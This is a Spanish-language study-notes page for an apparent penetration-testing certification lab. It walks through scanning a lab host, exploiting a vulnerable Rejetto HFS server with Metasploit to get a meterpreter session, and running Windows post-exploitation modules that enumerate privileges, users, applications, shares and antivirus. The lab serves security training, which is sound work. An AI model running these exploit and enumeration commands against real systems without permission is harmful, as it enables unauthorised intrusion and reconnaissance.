> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/postexplotacion-en-windows/modulos-de-postexplotacion-windows.md).

# Módulos de postexplotación windows

Metasploit Framework (MSF) nos proporciona una variedad de **módulos de post explotación** tanto para sistemas **Windows** como **Linux**.

En el caso de Windows, podemos utilizar estos módulos para **enumerar información crítica** del sistema al que ya tenemos acceso:

#### 🔍 Enumeración típica en Windows

* ✅ Enumerar **privilegios del usuario** actual.
* 👥 Enumerar **usuarios conectados** actualmente.
* 🖥️ Detectar si el sistema se encuentra en una **máquina virtual (VM)**.
* 📦 Enumerar **programas instalados** en el sistema.
* 🛡️ Detectar **antivirus** instalados y activos.
* 🧑‍🤝‍🧑 Enumerar **equipos conectados al dominio**.
* 🛠️ Enumerar **parches de seguridad** instalados.
* 📁 Enumerar **carpetas compartidas** (shares).

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/FkqNz8T8NTyatlfmZ4hB" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/2mkIoh7luNOmDWWke9zH" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo nmap contra el objetivo:

**Dominio:**

```
nmap -sV demo.ine.local
```

Este escaneo puede tardar hasta un minuto.

<figure><img src="/files/Aj1gFRZijtHqFD7TPm8y" alt=""><figcaption></figcaption></figure>

El sistema de destino tiene una versión vulnerable del servidor de archivos HTTP Rejetto que se ejecuta en el puerto 80 y que puede explotarse mediante el uso de un módulo Metasploit.

**Paso 4:** Para comenzar, necesitaremos iniciar la consola de Metasploit Framework (msfconsole) ejecutando el siguiente comando:

**Dominio:**

```
msfconsole -q
```

Luego podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/windows/http/rejetto_hfs_exec
```

Tras cargar el módulo, debemos configurar sus opciones, concretamente la IP de destino. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo.ine.local
```

Ahora podemos ejecutar el módulo ejecutando el siguiente comando:

**Dominio:**

```
run
```

<figure><img src="/files/L0ujtKx7QoVUHO1d6x8w" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, la ejecución exitosa del módulo nos proporcionará una sesión de meterpreter.

Ahora hemos obtenido acceso al sistema Windows y podemos comenzar el proceso de automatización de la post explotación con Metasploit.

**Paso 5:** Automatizar la post-explotación con Metasploit.

Dado que hemos obtenido una sesión de meterpreter en el sistema de destino, podemos aprovechar varios módulos de post-explotación para automatizar la enumeración de información importante.

Para empezar, deberás poner tu sesión actual de meterpreter en segundo plano, esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
background
```

<figure><img src="/files/YfECR0fNcyIIlkN4YN86" alt=""><figcaption></figcaption></figure>

El primer módulo que podemos explorar es **win\_privs** , que permite automatizar la enumeración de los privilegios de usuario actuales. Podemos cargar el módulo, configurar la opción **SESSION** y ejecutarlo con los siguientes comandos:

**Comandos:**

```
use post/windows/gather/win_privs
set SESSION 1
run
```

<figure><img src="/files/BM1nJK7j61XGFGmx68CB" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, este módulo enumerará los privilegios del usuario actual al que tiene acceso en el sistema de destino y le proporcionará información útil como si el usuario es administrador y si UAC está habilitado o deshabilitado.

El siguiente módulo que podemos usar es **enum\_logged\_on\_users,** que, como su nombre indica, enumera una lista de usuarios conectados actualmente y anteriormente. Ejecute el módulo:

**Comandos:**

```
use post/windows/gather/enum_logged_on_users
set SESSION 1
run
```

<figure><img src="/files/XtXjkLQ6sLCjn0uEDKi6" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, este módulo enumerará una lista de usuarios conectados actualmente y anteriormente, así como los respectivos SID de las cuentas de usuario.

También podemos comprobar si el sistema de destino es una máquina virtual mediante el módulo **checkvm** . Este módulo indicará si el sistema de destino es una máquina virtual o un contenedor. Ejecute el módulo:

**Comandos:**

```
use post/windows/gather/checkvm
set SESSION 1
run
```

<figure><img src="/files/MZvn6PpEP0qGBW5ajKcA" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo nos dice que el sistema de destino es una máquina virtual que se ejecuta en el hipervisor Xen.

Otro módulo importante es **enum\_applications** . Este módulo enumera una lista de aplicaciones o programas instalados en el sistema de destino. Ejecute el módulo:

**Dominio:**

```
use post/windows/gather/enum_applications
set SESSION 1
run
```

<figure><img src="/files/mzHsaFFbot8xj70zbZCR" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo enumera una lista de aplicaciones instaladas. Esta información es muy útil, ya que permite buscar vulnerabilidades en los programas instalados que puedan aprovecharse para aumentar sus privilegios o revelar información importante. También le da una idea del propósito de este sistema.

Podemos usar el módulo **enum\_computers** para enumerar una lista de computadoras conectadas a la misma LAN de la que forma parte el objetivo. Pruebe a ejecutar el módulo:

**Comandos:**

```
use post/windows/gather/enum_computers
set SESSION 1
run
```

<figure><img src="/files/jOoi3wwv8WMKw0vBhGfj" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo revela que el sistema de destino no es parte de un dominio de Windows.

También podemos enumerar una lista de recursos compartidos mediante el módulo **enum\_shares** . Ejecute el módulo:

**Comandos:**

```
use post/windows/gather/enum_shares
set SESSION 1
run
```

<figure><img src="/files/JNGmZiEFnMBNwWTDFHWq" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo solo encuentra el recurso compartido de impresión.

#### Conclusión

En este laboratorio, exploramos el proceso de automatización de la postexplotación en un sistema de destino Windows aprovechando varios módulos de Metasploit de postexplotación.
